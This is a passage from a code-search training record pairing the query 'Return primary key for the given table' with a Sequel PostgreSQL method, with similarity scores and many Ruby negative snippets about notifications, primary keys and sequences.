"def notify!(message)\n message = message.merge(reference: @reference) if @reference\n\n notification_url = @notification_url\n if notification_url\n message_json = message.stringify_keys.to_json\n\n # TODO: Retry on failure\n @logger.info { \"Notifying #{notification_url} with message: #{message_json}\" }\n begin\n Excon.post(notification_url,\n :body => message_json,\n :headers => {'Content-Type' => 'application/json; charset=utf-8'})\n rescue => exception\n Application.get.report_exception(exception, \"Notification failed with exception\")\n end\n else\n if (river = Application.get.river)\n begin\n river.publish(message.merge(\n uid: @uid,\n event: \"tootsie_#{message[:event]}\"))\n rescue => exception\n Application.get.report_exception(exception, \"River notification failed with exception\")\n end\n end\n end\n end",
"def subscribe(channel, &block)\n faye.subscribe \"/topic/#{channel}\", &block\n end",
"def push_many(channels, notification_view)\n return if channels.empty?\n message = notification_view.render_to_string\n Pusher.trigger_async(channels, EVENT, {message: message, type: notification_view.type.to_s}) \n end",
"def notification(method, *args)\n data = Request.new(method, args, nil).data\n RPC.log \"CLIENT ENCODE NOTIFICATION #{data.inspect}\"\n data.to_json\n end",
"def notify! message_obj = OpenStruct.new, to = nil\n slack_hash = Hash.new\n channel = get_channel config.adapters[:slack], to\n slack_hash['channel'] = channel\n optional_parameters = [:username, :icon_url, :icon_emoji]\n optional_parameters.each do |op|\n if config.adapters[:slack][op]\n slack_hash[op] = config.adapters[:slack][op]\n end\n end\n\n slack_hash['text'] = get_message_body(binding)\n\n @logger.debug \"slack parameters: #{slack_hash.inspect}\"\n \n if config.test? then\n @logger.info \"Not sending message in test mode\"\n return true\n end\n\n begin\n @logger.debug \"Posting to slack webhook: #{@webhook_url}\"\n reply = HTTParty.post(@webhook_url, :body => JSON.dump(slack_hash))\n reply.response.value # this raises an error if the response said it was unsuccessful\n true\n rescue CollinsNotify::CollinsNotifyException => e\n @logger.error \"error sending slack notification - #{e}\"\n raise e\n rescue Exception => e\n @logger.error \"#{e.class.to_s} - error sending slack notification - #{e}\"\n raise CollinsNotify::CollinsNotifyException.new e\n end\n end",
"def notify(message)\n @slack.ping(message) if NOTIFICATION_ENVIRONMENTS.include? Rails.env\n end",
"def send_notification(method, params); end",
"def invite(nickname, channel)\n raw \"INVITE #{nickname} #{channel}\\r\\n\"\n end",
"def channel=(chan)\n notes.each{|n| n.channel = chan}\n end",
"def notify(message)\n g = Client.new(grove_channel_token,\n :service => grove_service,\n :icon_url => grove_icon_url,\n :url => grove_url\n )\n\n unless g.notify(message)\n # error\n logger.important \"Failed to send notification to grove.io\"\n end\n end"
] |
[
"0.8064743",
"0.57137465",
"0.5685415",
"0.56356466",
"0.5602777",
"0.55876213",
"0.54835033",
"0.5469714",
"0.5420852",
"0.5420809",
"0.5384294",
"0.5377497",
"0.53681254",
"0.53485763",
"0.5333337",
"0.5321088",
"0.5249252",
"0.523603",
"0.5228612",
"0.52157784",
"0.52153087",
"0.5209446",
"0.51458263",
"0.51039755",
"0.50940925",
"0.5089084",
"0.5062675",
"0.50612235",
"0.5034023",
"0.5022701",
"0.5008444",
"0.4980165",
"0.49544582",
"0.49541402",
"0.49528182",
"0.49523115",
"0.4947653",
"0.49425358",
"0.49425358",
"0.49328288",
"0.49222198",
"0.49163654",
"0.48958987",
"0.48872346",
"0.48822084",
"0.48758277",
"0.48729765",
"0.48681578",
"0.48316905",
"0.48241928",
"0.48105478",
"0.47816196",
"0.47680014",
"0.47662264",
"0.47603706",
"0.4756261",
"0.4752746",
"0.4751311",
"0.47320813",
"0.47286803",
"0.47256777",
"0.47232094",
"0.47017434",
"0.46927166",
"0.4691894",
"0.46869084",
"0.4686053",
"0.46825203",
"0.46807712",
"0.46710917",
"0.46653765",
"0.46630752",
"0.46598426",
"0.46513534",
"0.46442318",
"0.46425837",
"0.46402347",
"0.46284276",
"0.46202213",
"0.46167594",
"0.4616139",
"0.46057028",
"0.4601806",
"0.45991465",
"0.459571",
"0.459571",
"0.45936882",
"0.45932767",
"0.4593196",
"0.45918718",
"0.45913526",
"0.45864615",
"0.4585766",
"0.4581009",
"0.45804554",
"0.45793194",
"0.4579251",
"0.45750117",
"0.45683676",
"0.45634863"
] |
0.77982366
|
1
|
Return primary key for the given table.
|
def primary_key(table, opts=OPTS)
quoted_table = quote_schema_table(table)
Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}
value = _select_pk_ds.where_single_value(Sequel[:pg_class][:oid] => regclass_oid(table, opts))
Sequel.synchronize{@primary_keys[quoted_table] = value}
end
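
A minimal usage sketch for the method above (not part of the source record); the connection URL and the :users table are assumptions, but DB.primary_key is Sequel's real PostgreSQL adapter API as shown in the record:

require 'sequel'

# Hypothetical setup: any Sequel PostgreSQL connection would do here.
DB = Sequel.connect('postgres://localhost/mydb')

DB.primary_key(:users)  # first call resolves the pkey via pg_class and caches it
DB.primary_key(:users)  # repeat calls return the cached value under Sequel.synchronize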
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def primary_key(table)\n pk_and_sequence = pk_and_sequence_for(table)\n pk_and_sequence && pk_and_sequence.first\n end",
"def primary_key table\n return nil unless table\n table = self[table]\n pk = table.column_names.find{ |c| table[c].primary_key? }\n end",
"def primary_key(table_name)\n 'id' # table.primary_key || 'id'\n end",
"def primary_key(table_name)\n pk_and_sequence = pk_and_sequence_for(table_name)\n pk_and_sequence && pk_and_sequence.first\n end",
"def primary_key(table_name)\n pk_and_sequence_for(table_name)[0]\n rescue\n nil\n end",
"def primary_key(table)\n t = dataset.send(:input_identifier, table)\n @primary_keys.fetch(t) do\n pk = fetch(\"SELECT RDB$FIELD_NAME FROM RDB$INDEX_SEGMENTS NATURAL JOIN RDB$RELATION_CONSTRAINTS WHERE RDB$CONSTRAINT_TYPE = 'PRIMARY KEY' AND RDB$RELATION_NAME = ?\", t).single_value\n @primary_keys[t] = dataset.send(:output_identifier, pk.rstrip) if pk\n end\n end",
"def find_primary_key_by_table(table_name)\n @opts[:primary_key].values_at(table_name).first\n end",
"def primary_key(table_name)\n # TODO: Change this to be a pure mongo lookup by digging into document definitions\n # TODO: Manage _id and id\n id_definition = Mongo::DocumentDefinition.fields_for(table_name).find { |_, field_definition| field_definition['primary_key'] }\n Array(id_definition).first # && id_definition.first || '_id'\n end",
"def primary_key(table_name)\n table_name = table_name.to_s\n\n @primary_keys ||= {}\n @primary_keys[table_name] ||= if @registration[:primary_key].present?\n @registration[:primary_key].call(@connection, table_name)\n else\n @connection.primary_key(table_name)\n end\n end",
"def primary_key(table_name) #:nodoc:\r\n sql = \"SELECT COLUMN_NAME FROM (EXECUTE PROCEDURE sp_GetBestRowIdentifier( NULL, NULL, '#{table_name}', NULL, FALSE)) as gbri\"\r\n rs = select(sql)\r\n if !rs.nil? and !rs[0].nil?\r\n strip_or_self(rs[0]['COLUMN_NAME'])\r\n else\r\n nil\r\n end\r\n end",
"def primary_key(table_name, opts=OPTS)\n quoted_table = quote_schema_table(table_name)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n out_identifier, in_identifier = identifier_convertors(opts)\n schema, table = schema_or_current_and_table(table_name, opts)\n dataset = metadata_dataset.\n select(:kc__column_name).\n from(Sequel.as(:information_schema__key_column_usage, 'kc')).\n join(Sequel.as(:information_schema__table_constraints, 'tc'),\n [:table_name, :table_schema, :constraint_name]).\n where(:kc__table_name => in_identifier.call(table),\n :kc__table_schema => schema,\n :tc__constraint_type => 'PRIMARY KEY')\n value = dataset.map do |row|\n out_identifier.call(row.delete(:column_name))\n end\n value = case value.size\n when 0 then nil\n when 1 then value.first\n else value\n end\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def primary_key_name\n @primary_key_name ||= @connection.schema[@table_name.to_s][:primary_key]\n end",
"def primary_key(table_name)\n pk = super\n\n if pk == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n nil\n else\n pk\n end\n end",
"def primary_key(table_name)\n stmt = @connection.primary_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n result[0] && result[0][3]\n end",
"def find_primary_key(table)\n query = %q{\n SELECT column_name\n FROM information_schema.table_constraints tc\n INNER JOIN\n information_schema.key_column_usage kcu\n ON tc.constraint_name = kcu.constraint_name\n WHERE constraint_type = 'PRIMARY KEY'\n AND tc.table_catalog = 'reaktor'\n AND tc.table_schema = 'public'\n AND tc.table_name = ?\n ORDER BY ordinal_position;\n }\n\n sth = $dbh_pg.prepare(query)\n begin\n sth.execute(table.to_s)\n rescue\n $stderr.puts \"### Error in #{__FILE__} on line #{__LINE__}. See errorlog\"\n Log.write_log('error', \"Could not find primary key. Message: #{$!}. query: #{get_query_string(sth)}\")\n raise\n exit\n end\n pk = []\n while row = sth.fetch\n pk << row[0]\n end\n return pk\nend",
"def pkey\n table = self.class.table_name\n key = get_primary_key_values.first\n return key\n end",
"def key\n get_primary_key_value_map[self.class.table_name]\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key(_table_name)\n []\n end",
"def pk_and_sequence_for(table_name)\n (owner, table_name) = @connection.describe(table_name)\n\n # RSI: changed select from all_constraints to user_constraints - much faster in large data dictionaries\n pks = select_values(<<-SQL, 'Primary Key')\n select cc.column_name\n from user_constraints c, user_cons_columns cc\n where c.owner = '#{owner}'\n and c.table_name = '#{table_name}'\n and c.constraint_type = 'P'\n and cc.owner = c.owner\n and cc.constraint_name = c.constraint_name\n SQL\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first), nil] : nil\n end",
"def primary_key\n @primary_key ||= @klass.primary_key.to_s\n end",
"def primary_key(table, field)\n execute \"ALTER TABLE #{table} ADD PRIMARY KEY(#{field_list(field)})\"\n end",
"def primary_keys(table)\n row = exec_query(<<-end_sql, 'SCHEMA').rows.map do |row|\n SELECT DISTINCT(attr.attname)\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = cons.conkey[1]\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n row && row.first\n end\n end",
"def primary_key\n @primary_key ||= :id\n end",
"def primary_key\n @primary_key\n end",
"def full_primary_key(klass)\n \"#{klass.quoted_table_name}.#{klass.quoted_primary_key}\"\n end",
"def primary_key\n return @primary_key if @primary_key\n return 'id' if @id\n \n candidates = @columns.find_all { |col| col.unique }.map { |col| col.name }\n return 'id' if candidates.include? 'id'\n candidates.find { |c| c =~ eval(\"/^#{@name}.*id$/i\") } ||\n candidates.find { |c| c =~ eval(\"/^#{singularize}.*id$/i\") } ||\n candidates.find { |c| c =~ eval(\"/^#{pluralize}.*id$/i\") } ||\n candidates.first\n end",
"def primary_key\n @primary_key || 'id'\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n return @primary_key if @primary_key\n @primary_key = dimension_table.to_s.camelize.constantize.primary_key.to_sym\n rescue NameError => e\n ETL::Engine.logger.debug \"couldn't get primary_key from dimension model class, using default :id\"\n @primary_key = :id\n end",
"def primary_key\n case primary_key_prefix_type\n when :table_name\n Inflector.foreign_key(class_name_of_active_record_descendant(self), false)\n when :table_name_with_underscore\n Inflector.foreign_key(class_name_of_active_record_descendant(self))\n else\n \"id\"\n end\n end",
"def primary_keys(table)\n pks = query(<<-end_sql, 'SCHEMA')\n SELECT DISTINCT attr.attname\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = any(cons.conkey)\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n pks.present? ? pks[0] : pks\n end",
"def primary_key_sequence(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_key_sequences[quoted_table] if @primary_key_sequences.has_key?(quoted_table)}\n cond = {Sequel[:t][:oid] => regclass_oid(table, opts)}\n value = if pks = _select_serial_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], pks[:sequence]))\n elsif pks = _select_custom_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], LiteralString.new(pks[:sequence])))\n end\n\n Sequel.synchronize{@primary_key_sequences[quoted_table] = value} if value\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def primary_key\n send( self.class.primary_key )\n end",
"def association_primary_key(klass = nil)\n active_record.primary_key\n end",
"def primary_key(value=nil)\n self.primary_key = value unless value.nil?\n \n @primary_key ||= :id\n end",
"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def primary_key\n select(&:primary_key?)\n end",
"def primary_key\n '_id'\n end",
"def primary_key\n 'id'\n end",
"def primary_key\n fields.select { |f| f.key }.map(&:name)\n end",
"def primary_key\n self[:primary_key]\n end",
"def primary_key\n primary_key = attributes.find { |a| a.primary_key? }\n error(\"Unable to locate primary key for #{self.name}, attributes => #{attributes.collect { |a| a.name }}\") unless primary_key\n primary_key\n end",
"def primary_key_for(entity_name)\n namespace, _, entity_name = entity_name.rpartition('.')\n raise ArgumentError, 'Namespace missing' if namespace.nil? || namespace.empty?\n schemas[namespace].primary_key_for(entity_name)\n end",
"def primary_key_for(entity_name)\n namespace, _, entity_name = entity_name.rpartition('.')\n raise ArgumentError, 'Namespace missing' if namespace.nil? || namespace.empty?\n schemas[namespace].primary_key_for(entity_name)\n end",
"def pk_and_sequence_for(table_name, with_seq_schema = false)\n result = select_rows(\n \"SELECT kc.column_name, \"+\n (with_seq_schema ? \"c.sequence_schema, \" : \"\") +\n \" c.sequence_name \"+\n \"FROM information_schema.table_constraints tc \"+\n \"INNER JOIN information_schema.key_column_usage kc \"+\n \" ON tc.table_schema = kc.table_schema \"+\n \" AND tc.table_name = kc.table_name \"+\n \" AND tc.constraint_name = kc.constraint_name \"+\n \"LEFT JOIN information_schema.columns c \"+\n \" ON kc.table_schema = c.table_schema \"+\n \" AND kc.table_name = c.table_name \"+\n \" AND kc.column_name = c.column_name \"+\n \"WHERE tc.table_schema = CURRENT_SCHEMA \"+\n \" AND tc.table_name = '#{table_name}' \"+\n \" AND tc.constraint_type = 'PRIMARY KEY'\",\n SCHEMA_LOG_NAME\n )\n (result.length == 1) ? result[0] : nil\n rescue\n nil\n end",
"def pkey_selection(table = nil)\n prefix = table ? \"#{table}.\" : \"\"\n \"#{primary_key.map { |k| \"#{prefix}`#{k}` AS '#{k}'\" }.join(', ')}\"\n end",
"def primary_key\n @attributes[self.primary_key_attribute]\n end",
"def orchestrate_primary_key\n id\n end",
"def table_primary_keys table_name, include_parent_keys = false\n sql = +\"WITH TABLE_PK_COLS AS ( \"\n sql << \"SELECT C.TABLE_NAME, C.COLUMN_NAME, C.INDEX_NAME, C.COLUMN_ORDERING, C.ORDINAL_POSITION \"\n sql << \"FROM INFORMATION_SCHEMA.INDEX_COLUMNS C \"\n sql << \"WHERE C.INDEX_TYPE = 'PRIMARY_KEY' \"\n sql << \"AND TABLE_CATALOG = '' \"\n sql << \"AND TABLE_SCHEMA = '') \"\n sql << \"SELECT INDEX_NAME, COLUMN_NAME, COLUMN_ORDERING, ORDINAL_POSITION \"\n sql << \"FROM TABLE_PK_COLS \"\n sql << \"INNER JOIN INFORMATION_SCHEMA.TABLES T USING (TABLE_NAME) \"\n sql << \"WHERE TABLE_NAME = %<table_name>s \"\n sql << \"AND TABLE_CATALOG = '' \"\n sql << \"AND TABLE_SCHEMA = '' \"\n unless include_parent_keys\n sql << \"AND (T.PARENT_TABLE_NAME IS NULL OR COLUMN_NAME NOT IN ( \"\n sql << \" SELECT COLUMN_NAME \"\n sql << \" FROM TABLE_PK_COLS \"\n sql << \" WHERE TABLE_NAME = T.PARENT_TABLE_NAME \"\n sql << \")) \"\n end\n sql << \"ORDER BY ORDINAL_POSITION\"\n execute_query(\n sql,\n table_name: table_name\n ).map do |row|\n Index::Column.new \\\n table_name,\n row[\"INDEX_NAME\"],\n row[\"COLUMN_NAME\"],\n order: row[\"COLUMN_ORDERING\"],\n ordinal_position: row[\"ORDINAL_POSITION\"]\n end\n end",
"def primary_key\n cached_fetch(:primary_key){associated_class.primary_key || raise(Error, \"no primary key specified for #{associated_class.inspect}\")}\n end",
"def insert_pk\n if (f = opts[:from]) && !f.empty?\n case t = f.first\n when Symbol, String, SQL::Identifier, SQL::QualifiedIdentifier\n if pk = db.primary_key(t)\n pk\n end\n end\n end\n end",
"def table_id\n\n end",
"def primary_key\n self.class.primary_key == :id ? id : @saved_attributes[self.class.primary_key]\n end",
"def primary_key_attribute\n :id\n end",
"def generate_primary_key\n self[self.class.primary_key] ||= self.class.new_primary_key(10_000)\n end",
"def primary_key=(key)\n @primary_key = key\n end",
"def scaffold_primary_key\n get_key_array_safe(key).name\n end",
"def primary_key(name, type = :primary_key, **options)\n column(name, type, **options.merge(primary_key: true))\n end",
"def primary_key_value(obj)\n obj.pk\n end",
"def primary_key_names(table_name, options = {})\n return connection.primary_key_names(table_name) if options[:raw]\n \n self.primary_key_names_cache ||= {}\n result = primary_key_names_cache[table_name]\n unless result\n result = manual_primary_keys[table_name] || connection.primary_key_names(table_name)\n primary_key_names_cache[table_name] = result\n end\n result\n end",
"def quoted_primary_key\n @quoted_primary_key ||= connection.quote_column_name(primary_key)\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def to_param\n self.primary_key\n end",
"def primary_key_type\n \"integer PRIMARY KEY\"\n end",
"def pk(ta, h)\n x = primary_keys[ta]\n if x.is_a?(Array)\n unless x == []\n x = x.map{|ca| h[ca]}\n x if x.all?\n end\n else\n h[x]\n end\n end",
"def key\n stores_foreign_key? ? foreign_key : primary_key\n end",
"def primary_key=(value)\n @primary_key = value && value.to_s\n @quoted_primary_key = nil\n end",
"def primary_key_value\n send(self.class.primary_key)\n end",
"def has_primary_key(db, table, key)\n return db.primary_key(table) == key.to_s if db.respond_to?(:primary_key)\n\n pk_column_info = db.schema(table).find { |column_info| column_info[0] == key }\n return false if pk_column_info.nil?\n\n pk_column_info[1][:primary_key] == true\nend",
"def pk_field(klass)\n pk = klass.primary_key\n return klass.ann(pk, :field) || pk\n end",
"def primary_key\n unless @primary_key\n pk_column_names = Set.new( primary_key_columns.collect { |c| c.name } )\n unique_indexes = indexes.values.find_all { |i| i.unique? }\n\n pk_result = []\n\n unique_indexes.each do |idx|\n idx_column_names = Set.new( idx.columns.collect { |c| c.name } )\n r = idx_column_names ^ pk_column_names\n if r.size == 0 then\n pk_result = idx.columns\n break\n end\n end\n\n # no joy, see about just using all the columns that say the are primary\n # keys\n if pk_result.empty? then\n pk_result = self.primary_key_columns\n end\n @primary_key = pk_result\n end\n return @primary_key\n end",
"def relation_primary_key(relation)\n relation_reflect(relation).association_primary_key\n end",
"def association_primary_key(klass = nil)\n options[:primary_key] || primary_key(klass || self.klass)\n end",
"def pk_and_sequence_for(table)\n # try looking for a seq with a dependency on the table's primary key :\n result = select(<<-end_sql, 'PK and Serial Sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? || result.empty?\n # if that fails, try parsing the primary key's default value :\n result = select(<<-end_sql, 'PK and Custom Sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN pg_get_expr(def.adbin, def.adrelid) !~* 'nextval' THEN NULL\n WHEN split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2) ~ '.' THEN\n substr(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2),\n strpos(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2), '.')+1)\n ELSE split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND pg_get_expr(def.adbin, def.adrelid) ~* 'nextval|uuid_generate'\n end_sql\n end\n\n [ result['attname'], result['relname'] ]\n rescue\n nil\n end",
"def pk\n raise(Error, \"No primary key is associated with this model\") unless key = primary_key\n case key\n when Array\n key.collect{|k| @values[k]}\n else\n @values[key]\n end\n end",
"def primary_keys(field)\n sql = \"SELECT #{field.primary_key_col} from #{field.table} \"\n sql += \"#{where_and(sql)} #{field.column} IS NOT NULL \" if field.leave_null\n field.where&.each_pair do |column, value|\n sql += \"#{where_and(sql)} #{column} = #{value} \"\n end\n sql += \"ORDER BY #{field.primary_key_col};\"\n execute(sql).split(\"\\n\")\nend",
"def primary_key\n self[:primary_key] ||= self[:model].primary_key\n end",
"def pk_and_sequence_for(table_name, owner = nil, desc_table_name = nil) # :nodoc:\n (owner, desc_table_name) = @raw_connection.describe(table_name)\n\n seqs = select_values_forcing_binds(<<~SQL.squish, \"SCHEMA\", [bind_string(\"owner\", owner), bind_string(\"sequence_name\", default_sequence_name(desc_table_name))])\n select us.sequence_name\n from all_sequences us\n where us.sequence_owner = :owner\n and us.sequence_name = upper(:sequence_name)\n SQL\n\n # changed back from user_constraints to all_constraints for consistency\n pks = select_values_forcing_binds(<<~SQL.squish, \"SCHEMA\", [bind_string(\"owner\", owner), bind_string(\"table_name\", desc_table_name)])\n SELECT cc.column_name\n FROM all_constraints c, all_cons_columns cc\n WHERE c.owner = :owner\n AND c.table_name = :table_name\n AND c.constraint_type = 'P'\n AND cc.owner = c.owner\n AND cc.constraint_name = c.constraint_name\n SQL\n\n warn <<~WARNING if pks.count > 1\n WARNING: Active Record does not support composite primary key.\n\n #{table_name} has composite primary key. Composite primary key is ignored.\n WARNING\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first),\n oracle_downcase(seqs.first)] : nil\n end",
"def pk_from_insert_sql(sql)\n sql[/into\\s+([^\\(]*).*values\\s*\\(/i]\n primary_key($1.strip) if $1\n end",
"def pk_from_insert_sql(sql)\n sql[/into\\s+([^\\(]*).*values\\s*\\(/i]\n primary_key($1.strip) if $1\n end",
"def primary_key\n @resource_options.fetch :primary_key, :\"#{singular_resource_name}_id\"\n end",
"def primary_key_constraint_sql_fragment(_)\n 'PRIMARY KEY'\n end",
"def insert_pk\n (f = opts[:from]) && !f.empty? && (t = f.first)\n case t\n when Symbol, String, SQL::Identifier, SQL::QualifiedIdentifier\n if pk = db.primary_key(t)\n Sequel::SQL::Identifier.new(pk)\n end\n end\n end",
"def primary_key\n fail NotImplementedError\n end",
"def primary_key?\n schema && schema[:primary_key]\n end",
"def qualified_primary_key\n cached_fetch(:qualified_primary_key){qualify_cur(primary_key)}\n end",
"def pk_hash\n model.primary_key_hash(pk)\n end",
"def hash_key\n read_attribute(table_hash_key)\n end",
"def primary_key_for(entity_name)\n metadata.xpath(\"//EntityType[@Name='#{entity_name}']/Key/PropertyRef\").first.attributes['Name'].value\n end",
"def default_primary_key\n model_name.foreign_key.to_s\n end",
"def extract_key(row)\n row.reject {|column, value| not primary_key_names.include? column }\n end",
"def primary_key\n self[:primary_key] ||= associated_class.primary_key\n end",
"def default_sequence_name(table_name, pri_key = nil)\n serial_sequence(table_name, pri_key || 'id').split('.').last\n rescue ActiveRecord::StatementInvalid\n \"#{table_name}_#{pri_key || 'id'}_seq\"\n end",
"def key(*fields)\n @primary_key = fields\n before_save :generate_key\n end"
] |
[
"0.8734996",
"0.8696134",
"0.85477465",
"0.8429715",
"0.8329904",
"0.83237815",
"0.8244794",
"0.8160607",
"0.7980489",
"0.7939842",
"0.7795205",
"0.7681589",
"0.76727057",
"0.7614512",
"0.75594294",
"0.7505976",
"0.74860096",
"0.7477005",
"0.7477005",
"0.7330574",
"0.7314233",
"0.72782254",
"0.720774",
"0.7170536",
"0.713582",
"0.7107255",
"0.70642257",
"0.705703",
"0.70305926",
"0.7015378",
"0.7015378",
"0.7015378",
"0.6949703",
"0.69369996",
"0.6927526",
"0.68937725",
"0.68385226",
"0.68385226",
"0.6824395",
"0.6816049",
"0.6812834",
"0.6800493",
"0.6786482",
"0.6773304",
"0.6734834",
"0.66945356",
"0.6653895",
"0.66014385",
"0.6580018",
"0.6580018",
"0.6552553",
"0.65245634",
"0.64966476",
"0.64776015",
"0.64618117",
"0.63613737",
"0.63526744",
"0.63279593",
"0.6310563",
"0.6310308",
"0.630781",
"0.6278599",
"0.62698853",
"0.6264069",
"0.62600964",
"0.62027574",
"0.61785144",
"0.6176011",
"0.6172968",
"0.6170658",
"0.6153318",
"0.6145228",
"0.6130355",
"0.6116704",
"0.6106912",
"0.6076497",
"0.6073204",
"0.60671175",
"0.6051506",
"0.6025944",
"0.60167354",
"0.6002494",
"0.5986534",
"0.59452343",
"0.5937026",
"0.5937026",
"0.5935474",
"0.5928869",
"0.591482",
"0.5913494",
"0.5911433",
"0.59062326",
"0.5904206",
"0.5881851",
"0.5848011",
"0.5844895",
"0.5831418",
"0.5829109",
"0.5822482",
"0.5816137"
] |
0.80371535
|
8
|
Return the sequence providing the default for the primary key for the given table.
|
def primary_key_sequence(table, opts=OPTS)
quoted_table = quote_schema_table(table)
Sequel.synchronize{return @primary_key_sequences[quoted_table] if @primary_key_sequences.has_key?(quoted_table)}
cond = {Sequel[:t][:oid] => regclass_oid(table, opts)}
value = if pks = _select_serial_sequence_ds.first(cond)
literal(SQL::QualifiedIdentifier.new(pks[:schema], pks[:sequence]))
elsif pks = _select_custom_sequence_ds.first(cond)
literal(SQL::QualifiedIdentifier.new(pks[:schema], LiteralString.new(pks[:sequence])))
end
Sequel.synchronize{@primary_key_sequences[quoted_table] = value} if value
end
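
As above, a hedged usage sketch for this record's method; DB and :users are assumptions, while primary_key_sequence itself is the Sequel PostgreSQL adapter method shown here:

require 'sequel'

# Hypothetical setup, mirroring the earlier sketch.
DB = Sequel.connect('postgres://localhost/mydb')

DB.primary_key_sequence(:users)
# => e.g. "\"public\".\"users_id_seq\"" for a serial column; for a custom
# nextval() default, the sequence name is parsed out of the column default.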
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n default_pk, default_seq = pk_and_sequence_for(table_name)\n default_seq || \"#{table_name}_#{pk || default_pk || 'id'}_seq\"\n end",
"def default_sequence_name(table_name, pri_key = nil)\n serial_sequence(table_name, pri_key || 'id').split('.').last\n rescue ActiveRecord::StatementInvalid\n \"#{table_name}_#{pri_key || 'id'}_seq\"\n end",
"def default_sequence_name(table_name, column = nil)\n pk, seq = pk_and_sequence_for(table_name)\n if column && (pk != column)\n # Is this ever actually called with a non-pk column?\n nil\n else\n seq\n end\n rescue\n nil\n end",
"def default_sequence_name(table_name, pk = \"id\")\n nil\n end",
